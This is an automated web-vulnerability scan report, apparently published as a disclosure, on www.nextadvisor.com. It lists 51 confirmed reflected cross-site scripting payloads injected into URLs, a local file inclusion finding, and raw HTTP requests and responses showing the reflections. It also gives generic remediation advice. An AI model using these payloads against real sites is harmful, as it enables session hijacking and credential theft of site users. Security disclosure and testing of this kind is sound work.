XSS, Cross Site Scripting in www.nextadvisor.com, CWE-79, CWE-23, Directory traversal, Local File Inclusion, LFI, CAPEC-86, DORK, GHDB REPORT SUMMARY

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Netsparker - Scan Report Summary

TARGET URL: http://www.nextadvisor.com/link.php?kw=gid9a%...
SCAN DATE: 4/23/2011 10:48:42 PM
REPORT DATE: 4/23/2011 11:16:23 PM
SCAN DURATION: 00:26:53
Total Requests: 5975
Average Speed: 3.70 req/sec.

67 identified, 55 confirmed, 0 critical, 7 informational

GHDB, DORK Tests

PROFILE: Previous Settings
ENABLED ENGINES: Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

IMPORTANT: 79 %
LOW: 10 %
INFORMATION: 10 %

VULNERABILITY SUMMARY

URL Parameter Method Vulnerability Confirmed
/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000B8)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/aboutus.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003B9)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/affiliate_program.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003FA)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/audiobooks/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000177)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000177)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/audiobooks/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000178)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000178)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/auto_insurance/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000198)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000198)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/auto_insurance/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00019A)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00019A)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/blog'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00058A)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/contactus.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003DA)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/credit_cards/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001B0)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B0)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/credit_cards/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001BC)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001BC)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/credit_report_monitoring/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00039A)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00039A)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/diet_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D1)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D1)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/diet_services/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001DE)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001DE)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/genealogy/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000222)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000222)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/genealogy/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00021D)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00021D)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/identity_theft_protection_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000238)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000238)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/identity_theft_protection_services/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000244)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000244)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/identity_theft_protection_services/protect_my_id_review.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000BD9)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/images/ Programming Error Message No
[Possible] Internal Path Leakage (*nix) No
/images/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000414)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/includes/ Forbidden Resource Yes
/includes/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00010D)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/includes/javascript.php script GET Local File Inclusion Yes
[Possible] Internal Path Leakage (*nix) No
/includes/javascript.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000144)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000147)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/internet_fax/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00025B)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00025B)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/internet_fax/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000266)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000266)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/internet_security_software/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000345)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000345)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/jsp-examples/index.html Default Tomcat Page Identified No
/link.php TRACE / TRACK Identified Yes
/link.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000C9)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/link.php~ Backup Source Code Found No
[Possible] Backup File Found No
E-mail Address Disclosure No
/link.php~'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000DA)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/online_backup_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000285)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000285)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/online_backup_services/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000288)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000288)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/online_college/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002A7)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002A7)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/online_college/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002AA)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002AA)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/online_dating/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002CA)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002CA)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/online_dating/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002CC)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002CC)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/online_dvd_rental_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FA)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001FA)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/online_dvd_rental_services/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000200)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000200)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/online_meeting/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002E9)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002E9)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/online_tax_preparation_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000356)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000356)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/parental_controls/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002EE)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002EE)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/payday_loans/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00030F)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00030F)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/payday_loans_tx/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0003BA)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003BA)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/people_search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000310)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000310)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/privacy.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003DC)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/remote_desktop/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000327)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000327)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/robots.txt Robots.txt Identified Yes
/savings_accounts/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000332)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000332)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/search_results.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000598)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/sitemap.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003FE)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/sitemap.xml Apache Version Disclosure No
PHP Version Disclosure No
OpenSSL Version Disclosure No
Apache Module Version Disclosure No
Sitemap Identified No
/style-wide.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000426)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/virtual_phone/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000368)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000368)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/voip_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000376)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000376)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/web_hosting/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000387)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000387)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
Cross-site Scripting

51 TOTAL (IMPORTANT), 51 CONFIRMED

XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application. This opens up several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, XSS allows attackers to hijack other users' sessions, so an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML, ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list need only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well-structured white-list libraries available for many different environments; good examples of these include the OWASP Reform and Microsoft Anti Cross-site Scripting libraries.

- /'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000B8)%3C/script%3E

/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000B8)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000B8)%3C/script%3E

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0000B8)</script>

Request

GET /'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000B8)%3C/script%3E HTTP/1.1
Referer: http://www.nextadvisor.com/link.php?kw=gid9a%20identity%20theft%20resource_ordering34&category=identitytheft&link=idtheftshield&id=227
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:55:15 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3524
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title>Online Reviews</title><meta name="description" content="Compare services at NextAdvisor.com to help you choose the best service for your needs."/><meta name="keywords" content="NextAdvisor, NextAdvisor.com, Next Advisor, NextAdviser, Next Adviser, ConsumerCompare, ConsumerCompare.org, voip, credit reports, identity theft, online education, dvd rental, diet, internet phone service, credit scores, id theft, online schools, movie rental, online diet programs, Vonage, Voip.com, Equifax, CreditCheck Total, FreeCreditreport.com, Identity Guard, LifeLock, TrustedID, LoudSiren, PrivacyMatters, University of Phoenix, Capella University, AIU, eDiets, South Beach Diet, Blockbuster, Netflix, Cinemanow" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/'"--></style></script><script>netsparker(0x0000B8)</script>" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) 
}catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option 
value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0000B8)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="aboutus.php">About Us</a> <span class="nav_border">|</span> <a href="management.php">Management</a> <span class="nav_border">|</span> <a href="pressroom.php">Press</a><span class="nav_border">|</span><a href="/affiliate_program.php">Affiliate Program</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" 
value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--> <div id="content" > <h1 style="padding-top:12px;">File Not Found</h1> <p class="welcome"> We're sorry, the file you requested could not be found. </p> <div style="clear:both" ></div> <!--Start Footer--> <div id="footer"></div> <div class="footer_content"> <div class="footer_left"> <h3>All Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p> <a href="/audiobooks/">Audio Books</a><br /> <a href="/auto_insurance/">Auto Insurance</a><br /> <a href="/credit_cards/">Credit Cards</a><br /> <a href="/credit_report_monitoring/">Credit Monitoring</a><br /> <a href="/diet_services/">Diet Programs</a><br /> <a href="/online_dvd_rental_services/">DVD Rental</a></p></td> <td><p> <a href="/genealogy/">Genealogy</a><br /> <a href="/identity_theft_protection_services/">Identity Theft</a><br /> <a href="/internet_fax/">Internet Fax</a><br /> <a href="/online_backup_services/">Online Backup</a><br /> <a href="/online_college/">Online College</a><br/> <a href="/online_dating/">Online Dating</a></p></td> <td><p> <a href="/online_meeting/">Online Meeting</a><br /> <a href="/parental_controls/">Parental Controls</a><br /> <a href="/payday_loans/">Payday Loans</a><br /> <a href="/people_search/">People Search</a><br /> <a href="/remote_desktop/">Remote Desktop</a><br /> <a href="/savings_accounts/">Savings Accounts</a> </p></td> <td><p> <a href="/internet_security_software/">Security Software</a><br /> <a href="/online_tax_preparation_services/">Tax Preparation</a><br /> <a href="/virtual_phone/">Virtual Phone</a><br /> <a href="/voip_services/">VoIP Services</a><br /> <a href="/web_hosting/">Web Hosting</a></p></td> </tr></table> 
</div> <div class="footer_right"><h3>Popular Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p><a href="/credit_report_monitoring/">Credit Monitoring Services</a><br /> <a href="/identity_theft_protection_services/">Identity Theft Services</a><br /> <a href="/web_hosting/">Web Hosting Services</a></p></td> <td><p><a href="/online_dating/">Online Dating Services</a><br /> <a href="/diet_services/">Online Diet Programs</a><br /> <a href="/voip_services/">VoIP Services</a></p></td> </tr> </table><div class="next_latest"><p><a href="/">NextAdvisor Home</a> <span>|</span><a href="/blog/">Latest Blog Headlines</a></p></div> </div> <br style="clear:both" /> </div> <!--End Footer Category--> <!--Start Bottom--> <div id="bottom"> <div id="logo_sml"> <div style="float:left;"><a href="/"><img src="/images/nextadvisor1_sml.gif" alt="" width="116" height="15" /></a><span class="bottomlink"><a href="/aboutus.php">About Us</a></span><span class="bottomlink"><a href="/blog">Blog</a></span><span class="bottomlink"><a href="/contactus.php">Contact Us</a></span><span class="bottomlink"><a href="/privacy.php">Terms &amp; Privacy Policy</a></span><span class="bottomlink"><a href="/affiliate_program.php">Affiliate Program</a></span><span class="bottomlink"><a href="/sitemap.php">Site Map</a></span><span class="bottomlink"><a href="http://twitter.com/nextadvisor" target="_blank">Follow Us On Twitter</a></span></div><div style="margin:3px 0 0 0; float:left"><a href="http://twitter.com/nextadvisor" target="_blank" style="text-decoration:none;"><img src="/images/twitter.gif" /></a></div><br style="clear:both"/> <!--End Bottom--> <p class="copyright">Copyright&#169; 2006 - 2011 NextAdvisor.com - All rights reserved.</p> </div> <!-- /logo_sml --> </div> <!-- /bottom --> <!--End Footer--> </div> <!--End Content--> <br style="clear:both" /> </div><!--End Content Container--></div><!--End Container--><script type="text/javascript">var gaJsHost = 
(("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-246595-2");pageTracker._trackPageview();} catch(err) {}</script></body></html>
- /link.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000C9)%3C/script%3E

/link.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000C9)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/link.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000C9)%3C/..

Parameters

Parameter Type Value
kw GET gid9a identity theft resource_ordering34
category GET identitytheft
link GET idtheftshield
id GET 227
URI-BASED Raw URI '"--></style></script><script>alert(0x0000C9)</script>

Request

GET /link.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000C9)%3C/script%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:55:55 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3524
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title>Online Reviews</title><meta name="description" content="Compare services at NextAdvisor.com to help you choose the best service for your needs."/><meta name="keywords" content="NextAdvisor, NextAdvisor.com, Next Advisor, NextAdviser, Next Adviser, ConsumerCompare, ConsumerCompare.org, voip, credit reports, identity theft, online education, dvd rental, diet, internet phone service, credit scores, id theft, online schools, movie rental, online diet programs, Vonage, Voip.com, Equifax, CreditCheck Total, FreeCreditreport.com, Identity Guard, LifeLock, TrustedID, LoudSiren, PrivacyMatters, University of Phoenix, Capella University, AIU, eDiets, South Beach Diet, Blockbuster, Netflix, Cinemanow" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/link.php'"--></style></script><script>netsparker(0x0000C9)</script>" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) 
}catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option 
